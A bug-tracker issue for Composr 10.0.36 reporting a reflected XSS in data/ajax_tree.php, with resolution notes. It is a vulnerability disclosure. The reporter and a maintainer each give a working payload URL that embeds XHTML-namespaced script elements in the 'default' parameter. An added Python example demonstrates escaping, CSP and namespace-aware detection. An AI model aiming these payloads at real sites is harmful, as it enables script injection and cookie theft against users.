View Issue Details

ID: 4633
Project: Composr
Category: core
View Status: private
Last Update: 2021-04-02 17:32
Reporter: Guest
Assigned To: Chris Graham
Priority: normal
Severity: Security-hole
Status: resolved
Resolution: fixed
Product Version: 10.0.36
Fixed in Version: 10.0.37
Summary: 4633: Reflected Cross Site Scripting (XSS)
Description: Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts.
Steps To Reproduce: To carry out the exploit, follow the steps below.
1. Visit the web URL under test; for our lab it is https://cve.iqsademo.com/composr/
2. The file https://cve.iqsademo.com/composr/data/ajax_tree.php has a parameter called default which is vulnerable.
3. Execute the following payload:
https://cve.iqsademo.com/composr/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script><a:script xmlns:a="http://www.w3.org/1999/xhtml">alert("XSS")</a:script><info><name><value><![CDATA[<script>confirm(document.domain)</script>]]></value></name><description><value>Hello</value></description><url><value>http://google.com</value></url></info></body></html>
4. It will show two pop-ups with the messages "Hello" and "XSS".
Tags: Type: Security
Attached Files
Xss POC.wmv (927,814 bytes)   
Screenshot.JPG (43,955 bytes)   
Activities

Chris Graham

2021-04-01 03:25

administrator   ~7042

This is confirmed.

Guest

2021-04-01 06:48

reporter   ~7044

Thank You,
Waiting for the resolution.

Chris Graham

2021-04-01 15:49

administrator   ~7045

Simpler test case:
http://example-site/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script>

The JavaScript is executing within the XML mime type via XML namespaces. Resolution is simple but we need to be careful to assume that XSS is not able to happen within other XML outputs.

Chris Graham

2021-04-01 19:54

administrator   ~7046

I don't think any of the developers were aware that JavaScript could be embedded in XML responses like this. Knowing this now, I have gone over all the XML responses and checked either XML or HTML escaping is used (preferably XML, but HTML will work in practice and is secure). Additionally as a secondary layer of defense, CSP headers will be put out to disable JavaScript for these requests - and I have tested that works.
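As an added illustration (example code written for this page, not Composr's own ajax_tree.php nor the fix in commit 833a06466), the following Python shows the mechanism described in notes ~7045 and ~7046: a reflected parameter written unescaped into an XML body becomes real markup, and when that markup is a script element in the XHTML namespace an XML-aware browser executes it whatever prefix the attacker picked; XML-escaping the value turns it back into character data, and a restrictive CSP is the secondary layer if escaping is ever missed. The response layout, the function names and the exact header values are assumptions for the example; the payload is modelled on the simpler test case in note ~7045.

```python
# Added example for this page; not Composr's code. Shows why the reported
# payload executes inside an XML response and how escaping neutralises it.
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

XHTML_NS = "http://www.w3.org/1999/xhtml"

# Constructed payload modelled on the simpler test case in note ~7045: the
# prefix is arbitrary, what matters is that the namespace URI is XHTML.
PAYLOAD = ('<something:script xmlns:something="http://www.w3.org/1999/xhtml">'
           'alert("Hello")</something:script>')


def vulnerable_response(default):
    """Hypothetical handler that reflects `default` into the XML body unescaped."""
    return ('<?xml version="1.0"?>'
            '<response><default>' + default + '</default></response>')


def hardened_response(default):
    """Same handler with the value XML-escaped (& < > become entities), so
    whatever the client sent can only ever be character data, never markup."""
    return ('<?xml version="1.0"?>'
            '<response><default>' + escape(default) + '</default></response>')


def xhtml_script_elements(xml_body):
    """Parse the body the way an XML-aware browser does and return every element
    whose expanded name is {http://www.w3.org/1999/xhtml}script, whatever prefix
    the author chose. A non-empty result means the response carries live script."""
    root = ET.fromstring(xml_body)
    return [el for el in root.iter() if el.tag == "{%s}script" % XHTML_NS]


def reflected_text(xml_body):
    """Return the character data of <default>, i.e. what a client reads back."""
    return ET.fromstring(xml_body).find("default").text or ""


def hardened_headers():
    """Secondary layer from note ~7046 (header values are an assumption for the
    example): serve the XML with a CSP that forbids script, so an escaping miss
    in some other XML output still cannot run code in the browser."""
    return {
        "Content-Type": "application/xml; charset=utf-8",
        "Content-Security-Policy": "default-src 'none'",
    }


if __name__ == "__main__":
    print("vulnerable: %d XHTML script element(s)"
          % len(xhtml_script_elements(vulnerable_response(PAYLOAD))))
    print("hardened:   %d XHTML script element(s)"
          % len(xhtml_script_elements(hardened_response(PAYLOAD))))
    print("hardened body keeps the value as text:",
          reflected_text(hardened_response(PAYLOAD)) == PAYLOAD)
```

The parser check is the useful part for an audit: rather than grepping responses for the literal string `<script`, it resolves namespaces and matches on the expanded name, which is exactly what the browser does and why the `something:` and `a:` prefixes in the report make no difference. Running the same check over every XML endpoint of an application is a quick way to confirm the "careful about other XML outputs" concern in note ~7045.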

Guest

2021-04-01 21:59

reporter   ~7049

Thank You. Waiting for the fix.

admin

2021-04-02 02:31

administrator   ~7053

Automated response: XSS in an XML script

One particular AJAX script that produces XML may be manipulated to output executable arbitrary JavaScript code. An XSS vulnerability is one whereby a hacker crafts a vulnerable URL that they then trick a target user (such as the webmaster) to access, causing the code to run on their machine and potentially expose things such as login cookies.

admin

2021-04-02 02:31

administrator   ~7054

Fixed in git commit 833a06466 (https://gitlab.com/composr-foundation/composr/commit/833a06466 - link will become active once code pushed to GitLab)

Guest

2021-04-02 10:29

reporter   ~7058

We're going to request a CVE for that. Let us know when you guys are prepared.
Thank You.

Chris Graham

2021-04-02 15:57

administrator   ~7059

A new patch version is out, and the issues are announced and mitigated. That means this (and the other security issue) are completed from our end, unless something else comes up. Let me know if you need something specific from us.

Guest

2021-04-02 17:32

reporter   ~7060

A certificate of appreciation will be a great motivation.
Author: Orion Hridoy
Company: BugsBD Private LTD.

Issue History

Date Modified Username Field Change
2021-03-31 08:04 Guest New Issue
2021-03-31 08:04 Guest Tag Attached: Type: Security
2021-03-31 08:04 Guest File Added: Xss POC.wmv
2021-03-31 08:04 Guest File Added: Screenshot.JPG
2021-04-01 03:25 Chris Graham Note Added: 0007042
2021-04-01 06:48 Guest Note Added: 0007044
2021-04-01 15:49 Chris Graham Note Added: 0007045
2021-04-01 19:54 Chris Graham Note Added: 0007046
2021-04-01 21:59 Guest Note Added: 0007049
2021-04-02 10:29 Guest Note Added: 0007058
2021-04-02 15:57 Chris Graham Note Added: 0007059
2021-04-02 17:32 Guest Note Added: 0007060